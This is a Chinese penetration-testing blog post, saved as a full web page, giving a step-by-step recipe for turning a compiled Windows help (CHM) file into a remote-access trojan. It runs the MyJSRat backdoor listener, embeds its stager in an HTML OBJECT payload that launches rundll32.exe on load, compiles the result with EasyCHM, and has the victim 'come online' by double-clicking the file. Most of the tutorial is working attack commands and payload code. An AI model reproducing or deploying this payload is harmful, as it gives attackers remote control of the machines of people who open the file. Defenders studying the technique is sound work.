<!DOCTYPE html>
<html lang="zh-cn">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="robots" content="noodp" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
        <title>MyJSRat结合CHM命令执行 - Geekby&#39;s Blog</title><meta name="Description" content="MyJSRat结合CHM命令执行"><meta property="og:title" content="MyJSRat结合CHM命令执行" />
<meta property="og:description" content="MyJSRat结合CHM命令执行" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://www.geekby.site/2019/07/myjsrat%E7%BB%93%E5%90%88chm%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2019-07-28T09:39:00+08:00" />
<meta property="article:modified_time" content="2019-07-28T09:39:00+08:00" />

<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="MyJSRat结合CHM命令执行"/>
<meta name="twitter:description" content="MyJSRat结合CHM命令执行"/>
<meta name="application-name" content="Geekby&#39;s Blog">
<meta name="apple-mobile-web-app-title" content="Geekby&#39;s Blog"><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" />
        <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"><link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"><link rel="manifest" href="/site.webmanifest"><link rel="canonical" href="https://www.geekby.site/2019/07/myjsrat%E7%BB%93%E5%90%88chm%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" /><link rel="prev" href="https://www.geekby.site/2019/07/%E5%B7%A5%E6%8E%A7%E5%AE%89%E5%85%A8%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" /><link rel="next" href="https://www.geekby.site/2019/08/cve-2019-14361cve-2019-14379%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" /><link rel="stylesheet" href="/lib/normalize/normalize.min.css"><link rel="stylesheet" href="/css/style.min.css"><link rel="stylesheet" href="/lib/fontawesome-free/all.min.css"><link rel="stylesheet" href="/lib/animate/animate.min.css"><script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "BlogPosting",
        "headline": "MyJSRat结合CHM命令执行",
        "inLanguage": "zh-cn",
        "mainEntityOfPage": {
            "@type": "WebPage",
            "@id": "https:\/\/www.geekby.site\/2019\/07\/myjsrat%E7%BB%93%E5%90%88chm%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C\/"
        },"image": ["https:\/\/www.geekby.site\/logo.png"],"genre": "posts","keywords": "Tips, 渗透测试","wordcount":  82 ,
        "url": "https:\/\/www.geekby.site\/2019\/07\/myjsrat%E7%BB%93%E5%90%88chm%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C\/","datePublished": "2019-07-28T09:39:00+08:00","dateModified": "2019-07-28T09:39:00+08:00","publisher": {
            "@type": "Organization",
            "name": "Geekby","logo": {
                    "@type": "ImageObject",
                    "url": "https:\/\/www.geekby.site\/images\/avatar.png",
                    "width":  358 ,
                    "height":  330 
                }},"author": {
                "@type": "Person",
                "name": "Geekby"
            },"description": "MyJSRat结合CHM命令执行"
    }
    </script></head>
    <body header-desktop="" header-mobile=""><script type="text/javascript">(window.localStorage && localStorage.getItem('theme') ? localStorage.getItem('theme') === 'dark' : ('auto' === 'auto' ? window.matchMedia('(prefers-color-scheme: dark)').matches : 'auto' === 'dark')) && document.body.setAttribute('theme', 'dark');</script>

        <div id="mask"></div><div class="wrapper"><header class="desktop" id="header-desktop">
    <div class="header-wrapper">
        <div class="header-title">
            <a href="/" title="Geekby&#39;s Blog">Geekby&#39;s Blog</a>
        </div>
        <div class="menu">
            <div class="menu-inner"><a class="menu-item" href="/posts/" title="文章"><i class="fas fa-inbox"></i> 文章 </a><a class="menu-item" href="/tags/" title="标签"><i class="fas fa-tags"></i> 标签 </a><a class="menu-item" href="/categories/" title="分类"><i class="fas fa-sort-amount-up-alt"></i> 分类 </a><a class="menu-item" href="/about/" title="关于"><i class="far fa-address-card"></i> 关于 </a><span class="menu-item delimiter"></span><span class="menu-item search" id="search-desktop">
                        <input type="text" placeholder="输入关键字" id="search-input-desktop">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-desktop" title="搜索">
                            <i class="fas fa-search fa-fw"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-desktop" title="清空">
                            <i class="fas fa-times-circle fa-fw"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-desktop">
                            <i class="fas fa-spinner fa-fw fa-spin"></i>
                        </span>
                    </span><a href="javascript:void(0);" class="menu-item theme-switch" title="切换主题">
                    <i class="fas fa-adjust fa-fw"></i>
                </a>
            </div>
        </div>
    </div>
</header><header class="mobile" id="header-mobile">
    <div class="header-container">
        <div class="header-wrapper">
            <div class="header-title">
                <a href="/" title="Geekby&#39;s Blog">Geekby&#39;s Blog</a>
            </div>
            <div class="menu-toggle" id="menu-toggle-mobile">
                <span></span><span></span><span></span>
            </div>
        </div>
        <div class="menu" id="menu-mobile"><div class="search-wrapper">
                    <div class="search mobile" id="search-mobile">
                        <input type="text" placeholder="输入关键字" id="search-input-mobile">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-mobile" title="搜索">
                            <i class="fas fa-search fa-fw"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-mobile" title="清空">
                            <i class="fas fa-times-circle fa-fw"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-mobile">
                            <i class="fas fa-spinner fa-fw fa-spin"></i>
                        </span>
                    </div>
                    <a href="javascript:void(0);" class="search-cancel" id="search-cancel-mobile">
                        取消
                    </a>
                </div><a class="menu-item" href="/posts/" title="文章"><i class="fas fa-inbox"></i>文章</a><a class="menu-item" href="/tags/" title="标签"><i class="fas fa-tags"></i>标签</a><a class="menu-item" href="/categories/" title="分类"><i class="fas fa-sort-amount-up-alt"></i>分类</a><a class="menu-item" href="/about/" title="关于"><i class="far fa-address-card"></i>关于</a><a href="javascript:void(0);" class="menu-item theme-switch" title="切换主题">
                <i class="fas fa-adjust fa-fw"></i>
            </a></div>
    </div>
</header>
<div class="search-dropdown desktop">
    <div id="search-dropdown-desktop"></div>
</div>
<div class="search-dropdown mobile">
    <div id="search-dropdown-mobile"></div>
</div>
<main class="main">
                <div class="container"><div class="toc" id="toc-auto">
            <h2 class="toc-title">目录</h2>
            <div class="toc-content" id="toc-content-auto"></div>
        </div><article class="page single"><h1 class="single-title animated flipInX">MyJSRat结合CHM命令执行</h1><div class="post-meta">
            <div class="post-meta-line"><span class="post-author"><a href="/" title="Author" rel=" author" class="author"><i class="fas fa-user-circle fa-fw"></i>Geekby</a></span>&nbsp;<span class="post-category">收录于 <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"><i class="far fa-folder fa-fw"></i>渗透测试</a></span></div>
            <div class="post-meta-line"><i class="far fa-calendar-alt fa-fw"></i>&nbsp;<time datetime="2019-07-28">2019-07-28</time>&nbsp;<i class="fas fa-pencil-alt fa-fw"></i>&nbsp;约 82 字&nbsp;
                <i class="far fa-clock fa-fw"></i>&nbsp;预计阅读 1 分钟&nbsp;</div>
        </div><div class="details toc" id="toc-static"  kept="">
                <div class="details-summary toc-title">
                    <span>目录</span>
                    <span><i class="details-icon fas fa-angle-right"></i></span>
                </div>
                <div class="details-content toc-content" id="toc-content-static"><nav id="TableOfContents">
  <ul>
    <li><a href="#myjsrat">MyJSRat</a></li>
    <li><a href="#easy-chm">Easy CHM</a></li>
    <li><a href="#步骤">步骤</a>
      <ul>
        <li><a href="#下载-myjsrat-并运行">下载 MyJSRat 并运行</a></li>
        <li><a href="#下载-wtf-文件">下载 wtf 文件</a></li>
        <li><a href="#将上面保存的代码写入到如下代码的-item1-的-value-值中">将上面保存的代码写入到如下代码的 Item1 的 Value 值中</a></li>
        <li><a href="#保存为-html-文件">保存为 HTML 文件</a></li>
        <li><a href="#通过-easychm-制作-chm-文件">通过 EasyCHM 制作 CHM 文件</a></li>
        <li><a href="#双击上线">双击上线</a></li>
      </ul>
    </li>
  </ul>
</nav></div>
            </div><div class="content" id="content"><h1 id="myjsrat结合chm命令执行">MyJSRat结合CHM命令执行</h1>
<h2 id="myjsrat">MyJSRat</h2>
<blockquote>
<p>MyJSRat 是 JSBackdoor 的 python 版本</p>
</blockquote>
<p>下载地址:<a href="https://github.com/Ridter/MyJSRat" target="_blank" rel="noopener noreffer">https://github.com/Ridter/MyJSRat</a></p>
<h2 id="easy-chm">Easy CHM</h2>
<blockquote>
<p>CHM是英语 Compiled Help Manual 的简写，即「已编译的帮助文件」。CHM 是微软新一代的帮助文件格式，利用 HTML 作源文，把帮助内容以类似数据库的形式编译储存。</p>
</blockquote>
<h2 id="步骤">步骤</h2>
<h3 id="下载-myjsrat-并运行">下载 MyJSRat 并运行</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">git clone https://github.com/Ridter/MyJSRat
</span></span></code></pre></td></tr></table>
</div>
</div><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">python MyJSRat.py -i IPaddr -p port
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170038.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170038.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170038.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170038.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170038.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170038.png-water_print" /></p>
<h3 id="下载-wtf-文件">下载 wtf 文件</h3>
<p>浏览器访问 <code>https://IPaddr:port/wtf</code>，并保存至 txt 文件中
<img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170053.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170053.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170053.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170053.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170053.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170053.png-water_print" /></p>
<h3 id="将上面保存的代码写入到如下代码的-item1-的-value-值中">将上面保存的代码写入到如下代码的 Item1 的 Value 值中</h3>
<p><code>注</code>：要在 rundll32.exe 前后添加<code>,</code></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="cp">&lt;!DOCTYPE html&gt;</span><span class="p">&lt;</span><span class="nt">html</span><span class="p">&gt;&lt;</span><span class="nt">head</span><span class="p">&gt;&lt;</span><span class="nt">title</span><span class="p">&gt;</span>Mousejack replay<span class="p">&lt;/</span><span class="nt">title</span><span class="p">&gt;&lt;</span><span class="nt">head</span><span class="p">&gt;&lt;/</span><span class="nt">head</span><span class="p">&gt;&lt;</span><span class="nt">body</span><span class="p">&gt;</span>command exec <span class="p">&lt;</span><span class="nt">OBJECT</span> <span class="na">id</span><span class="o">=</span><span class="s">x</span> <span class="na">classid</span><span class="o">=</span><span class="s">&#34;clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11&#34;</span> <span class="na">width</span><span class="o">=</span><span class="s">1</span> <span class="na">height</span><span class="o">=</span><span class="s">1</span><span class="p">&gt;&lt;</span><span class="nt">PARAM</span> <span class="na">name</span><span class="o">=</span><span class="s">&#34;Command&#34;</span> <span class="na">value</span><span class="o">=</span><span class="s">&#34;ShortCut&#34;</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nt">PARAM</span> <span class="na">name</span><span class="o">=</span><span class="s">&#34;Button&#34;</span> <span class="na">value</span><span class="o">=</span><span class="s">&#34;Bitmap::shortcut&#34;</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nt">PARAM</span> <span class="na">name</span><span class="o">=</span><span class="s">&#34;Item1&#34;</span> <span class="na">value</span><span class="o">=</span><span class="s">&#39;,rundll32.exe,&#39;</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nt">PARAM</span> <span class="na">name</span><span class="o">=</span><span class="s">&#34;Item2&#34;</span> <span class="na">value</span><span class="o">=</span><span class="s">&#34;273,1,1&#34;</span><span class="p">&gt;&lt;/</span><span class="nt">OBJECT</span><span class="p">&gt;&lt;</span><span class="nt">SCRIPT</span><span class="p">&gt;</span><span class="nx">x</span><span class="p">.</span><span class="nx">Click</span><span class="p">();&lt;/</span><span class="nt">SCRIPT</span><span class="p">&gt;&lt;/</span><span class="nt">body</span><span class="p">&gt;&lt;/</span><span class="nt">html</span><span class="p">&gt;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170128.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170128.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170128.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170128.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170128.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170128.png-water_print" /></p>
<h3 id="保存为-html-文件">保存为 HTML 文件</h3>
<p>新建目录，将上述代码保存在新建文件夹中</p>
<h3 id="通过-easychm-制作-chm-文件">通过 EasyCHM 制作 CHM 文件</h3>
<p>通过EasyCHM编译exp.html文件
<img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170140.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170140.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170140.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170140.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170140.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170140.png-water_print" /></p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170151.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170151.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170151.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170151.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170151.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170151.png-water_print" /></p>
<h3 id="双击上线">双击上线</h3>
<p>此时只要双击test.CHM文件，即可上线
<img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170201.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170201.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170201.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170201.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170201.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170201.png-water_print" /></p>
</div><div class="post-footer" id="post-footer">
    <div class="post-info">
        <div class="post-info-line">
            <div class="post-info-mod">
                <span>更新于 2019-07-28</span>
            </div>
            <div class="post-info-license"></div>
        </div>
        <div class="post-info-line">
            <div class="post-info-md"></div>
            <div class="post-info-share">
                <span><a href="javascript:void(0);" title="分享到 微博" data-sharer="weibo" data-url="https://www.geekby.site/2019/07/myjsrat%E7%BB%93%E5%90%88chm%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" data-title="MyJSRat结合CHM命令执行"><i class="fab fa-weibo fa-fw"></i></a><a href="javascript:void(0);" title="分享到 Evernote" data-sharer="evernote" data-url="https://www.geekby.site/2019/07/myjsrat%E7%BB%93%E5%90%88chm%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" data-title="MyJSRat结合CHM命令执行"><i class="fab fa-evernote fa-fw"></i></a><a href="javascript:void(0);" title="分享到 Skype" data-sharer="skype" data-url="https://www.geekby.site/2019/07/myjsrat%E7%BB%93%E5%90%88chm%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" data-title="MyJSRat结合CHM命令执行"><i class="fab fa-skype fa-fw"></i></a></span>
            </div>
        </div>
    </div>

    <div class="post-info-more">
        <section class="post-tags"><i class="fas fa-tags fa-fw"></i>&nbsp;<a href="/tags/tips/">Tips</a>,&nbsp;<a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a></section>
        <section>
            <span><a href="javascript:void(0);" onclick="window.history.back();">返回</a></span>&nbsp;|&nbsp;<span><a href="/">主页</a></span>
        </section>
    </div>

    <div class="post-nav"><a href="/2019/07/%E5%B7%A5%E6%8E%A7%E5%AE%89%E5%85%A8%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" class="prev" rel="prev" title="工控安全渗透"><i class="fas fa-angle-left fa-fw"></i>工控安全渗透</a>
            <a href="/2019/08/cve-2019-14361cve-2019-14379%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" class="next" rel="next" title="CVE-2019-14361与CVE-2019-14379漏洞复现">CVE-2019-14361与CVE-2019-14379漏洞复现<i class="fas fa-angle-right fa-fw"></i></a></div>
</div>
</article></div>
            </main><footer class="footer">
        <div class="footer-container"><div class="footer-line"><i class="far fa-copyright fa-fw"></i><span itemprop="copyrightYear">2019 - 2022</span><span class="author" itemprop="copyrightHolder">&nbsp;<a href="/" target="_blank">Geekby</a></span>&nbsp;|&nbsp;<span class="license"><a rel="license external nofollow noopener noreffer" href="https://creativecommons.org/licenses/by-nc/4.0/" target="_blank">CC BY-NC 4.0</a></span></div>
        </div>
    </footer></div>

        <div id="fixed-buttons"><a href="#" id="back-to-top" class="fixed-button" title="回到顶部">
                <i class="fas fa-arrow-up fa-fw"></i>
            </a><a href="#" id="view-comments" class="fixed-button" title="查看评论">
                <i class="fas fa-comment fa-fw"></i>
            </a>
        </div><link rel="stylesheet" href="/lib/lightgallery/lightgallery.min.css"><script type="text/javascript" src="/lib/smooth-scroll/smooth-scroll.min.js"></script><script type="text/javascript" src="/lib/autocomplete/autocomplete.min.js"></script><script type="text/javascript" src="/lib/algoliasearch/algoliasearch-lite.umd.min.js"></script><script type="text/javascript" src="/lib/lazysizes/lazysizes.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lightgallery.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lg-thumbnail.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lg-zoom.min.js"></script><script type="text/javascript" src="/lib/clipboard/clipboard.min.js"></script><script type="text/javascript" src="/lib/sharer/sharer.min.js"></script><script type="text/javascript">window.config={"code":{"copyTitle":"复制到剪贴板","maxShownLines":100},"comment":{},"lightGallery":{"actualSize":false,"exThumbImage":"data-thumbnail","hideBarsDelay":2000,"selector":".lightgallery","speed":400,"thumbContHeight":80,"thumbWidth":80,"thumbnail":true},"search":{"algoliaAppID":"C19A58DMI2","algoliaIndex":"blog","algoliaSearchKey":"a7203b4397475a3fcf49cea4495e0987","highlightTag":"em","maxResultLength":10,"noResultsFound":"没有找到结果","snippetLength":50,"type":"algolia"}};</script><script type="text/javascript" src="/js/theme.min.js"></script></body>
</html>
